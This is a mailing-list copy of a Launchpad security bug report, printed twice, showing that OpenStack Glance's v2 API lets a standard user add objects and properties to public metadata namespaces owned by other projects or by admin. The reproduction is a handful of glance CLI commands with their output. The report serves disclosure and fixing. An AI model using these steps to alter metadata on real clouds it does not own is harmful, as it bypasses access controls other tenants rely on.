yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #46292
[Bug 1545732] [NEW] glance v2 api: standard user can update other user's public metadefs
*** This bug is a security vulnerability ***
Private security bug reported:
If project 'd12bddf60e4649b2a2cf6a2cc7520d79' owns a global namespace:
$ openstack token issue
+------------+----------------------------------+
| Field | Value |
+------------+----------------------------------+
| expires | 2016-02-15T14:23:21Z |
| id | 7b8b9c6347f54d4ca5f543704068a0bb |
| project_id | d12bddf60e4649b2a2cf6a2cc7520d79 |
| user_id | e543889c522c46018c6a8f3ff71c1859 |
+------------+----------------------------------+
$ glance md-namespace-show NS1001
+------------+----------------------------------+
| Property | Value |
+------------+----------------------------------+
| created_at | 2016-02-15T12:56:09Z |
| namespace | NS1001 |
| objects | ["ob1"] |
| owner | d12bddf60e4649b2a2cf6a2cc7520d79 |
| protected | False |
| schema | /v2/schemas/metadefs/namespace |
| updated_at | 2016-02-15T12:56:09Z |
| visibility | public |
+------------+----------------------------------+
Another project can update that namespace (eg with a new object):
$ openstack token issue
+------------+----------------------------------+
| Field | Value |
+------------+----------------------------------+
| expires | 2016-02-15T14:25:09.152643Z |
| id | 0df5acec2b884f3c8cff744b4c4f66d0 |
| project_id | c4f1b829b3af4775abdc9d70059eac10 | <<<
| user_id | 10f27b7f965a47f98a828e4b342c03fd |
+------------+----------------------------------+
$ glance md-object-create --name objectx --schema {} NS1001
+------------+-----------------------------+
| Property | Value |
+------------+-----------------------------+
| created_at | 2016-02-15T13:25:33Z |
| name | objectx |
| schema | /v2/schemas/metadefs/object |
| updated_at | 2016-02-15T13:25:33Z |
+------------+-----------------------------+
This seems to also be possible if the namespace is owned by 'admin':
<as regular user, add an object to an admin owned namespace>
$ glance md-object-create --name objectx --schema {} OS::Compute::GuestMemoryBacking
+------------+-----------------------------+
| Property | Value |
+------------+-----------------------------+
| created_at | 2016-02-15T13:28:11Z |
| name | objectx |
| schema | /v2/schemas/metadefs/object |
| updated_at | 2016-02-15T13:28:11Z |
+------------+-----------------------------+
$ glance md-namespace-show OS::Compute::GuestMemoryBacking
+----------------------------+----------------------------------------------------------------------------------+
| Property | Value |
+----------------------------+----------------------------------------------------------------------------------+
| created_at | 2016-02-08T13:37:48Z |
| description | This provides the preferred backing option for guest RAM. Guest's memory can be |
| | backed by hugepages to limit TLB lookups. See also: |
| | https://wiki.openstack.org/wiki/VirtDriverGuestCPUMemoryPlacement |
| display_name | Guest Memory Backing |
| namespace | OS::Compute::GuestMemoryBacking |
| objects | ["objectx"] |
| owner | admin |
| properties | ["mem_page_size"] |
| protected | True |
| resource_type_associations | ["OS::Glance::Image", "OS::Cinder::Volume", "OS::Nova::Flavor"] |
| schema | /v2/schemas/metadefs/namespace |
| visibility | public |
+----------------------------+----------------------------------------------------------------------------------+
<as regular user, add a property to an admin owned namespace>
$ glance md-property-create --name propx --title title1 --schema '{"description": "x", "type":"string"}' OS::Compute::GuestMemoryBacking
+-------------+--------+
| Property | Value |
+-------------+--------+
| description | x |
| name | propx |
| title | title1 |
| type | string |
+-------------+--------+
In contrast, updating a private namespace is forbidden:
$ glance md-object-create --name objectx --schema {} NS1003
403 Forbidden: Forbidding request, metadata definition namespace=NS1003 is not visible. (HTTP 403)
I'm assuming that public namespaces are intended to be public in a read-
only sense (like images).
** Affects: glance
Importance: Undecided
Status: New
** Information type changed from Public to Private Security
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1545732
Title:
glance v2 api: standard user can update other user's public metadefs
Status in Glance:
New
Bug description:
If project 'd12bddf60e4649b2a2cf6a2cc7520d79' owns a global namespace:
$ openstack token issue
+------------+----------------------------------+
| Field | Value |
+------------+----------------------------------+
| expires | 2016-02-15T14:23:21Z |
| id | 7b8b9c6347f54d4ca5f543704068a0bb |
| project_id | d12bddf60e4649b2a2cf6a2cc7520d79 |
| user_id | e543889c522c46018c6a8f3ff71c1859 |
+------------+----------------------------------+
$ glance md-namespace-show NS1001
+------------+----------------------------------+
| Property | Value |
+------------+----------------------------------+
| created_at | 2016-02-15T12:56:09Z |
| namespace | NS1001 |
| objects | ["ob1"] |
| owner | d12bddf60e4649b2a2cf6a2cc7520d79 |
| protected | False |
| schema | /v2/schemas/metadefs/namespace |
| updated_at | 2016-02-15T12:56:09Z |
| visibility | public |
+------------+----------------------------------+
Another project can update that namespace (eg with a new object):
$ openstack token issue
+------------+----------------------------------+
| Field | Value |
+------------+----------------------------------+
| expires | 2016-02-15T14:25:09.152643Z |
| id | 0df5acec2b884f3c8cff744b4c4f66d0 |
| project_id | c4f1b829b3af4775abdc9d70059eac10 | <<<
| user_id | 10f27b7f965a47f98a828e4b342c03fd |
+------------+----------------------------------+
$ glance md-object-create --name objectx --schema {} NS1001
+------------+-----------------------------+
| Property | Value |
+------------+-----------------------------+
| created_at | 2016-02-15T13:25:33Z |
| name | objectx |
| schema | /v2/schemas/metadefs/object |
| updated_at | 2016-02-15T13:25:33Z |
+------------+-----------------------------+
This seems to also be possible if the namespace is owned by 'admin':
<as regular user, add an object to an admin owned namespace>
$ glance md-object-create --name objectx --schema {} OS::Compute::GuestMemoryBacking
+------------+-----------------------------+
| Property | Value |
+------------+-----------------------------+
| created_at | 2016-02-15T13:28:11Z |
| name | objectx |
| schema | /v2/schemas/metadefs/object |
| updated_at | 2016-02-15T13:28:11Z |
+------------+-----------------------------+
$ glance md-namespace-show OS::Compute::GuestMemoryBacking
+----------------------------+----------------------------------------------------------------------------------+
| Property | Value |
+----------------------------+----------------------------------------------------------------------------------+
| created_at | 2016-02-08T13:37:48Z |
| description | This provides the preferred backing option for guest RAM. Guest's memory can be |
| | backed by hugepages to limit TLB lookups. See also: |
| | https://wiki.openstack.org/wiki/VirtDriverGuestCPUMemoryPlacement |
| display_name | Guest Memory Backing |
| namespace | OS::Compute::GuestMemoryBacking |
| objects | ["objectx"] |
| owner | admin |
| properties | ["mem_page_size"] |
| protected | True |
| resource_type_associations | ["OS::Glance::Image", "OS::Cinder::Volume", "OS::Nova::Flavor"] |
| schema | /v2/schemas/metadefs/namespace |
| visibility | public |
+----------------------------+----------------------------------------------------------------------------------+
<as regular user, add a property to an admin owned namespace>
$ glance md-property-create --name propx --title title1 --schema '{"description": "x", "type":"string"}' OS::Compute::GuestMemoryBacking
+-------------+--------+
| Property | Value |
+-------------+--------+
| description | x |
| name | propx |
| title | title1 |
| type | string |
+-------------+--------+
In contrast, updating a private namespace is forbidden:
$ glance md-object-create --name objectx --schema {} NS1003
403 Forbidden: Forbidding request, metadata definition namespace=NS1003 is not visible. (HTTP 403)
I'm assuming that public namespaces are intended to be public in a
read-only sense (like images).
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1545732/+subscriptions
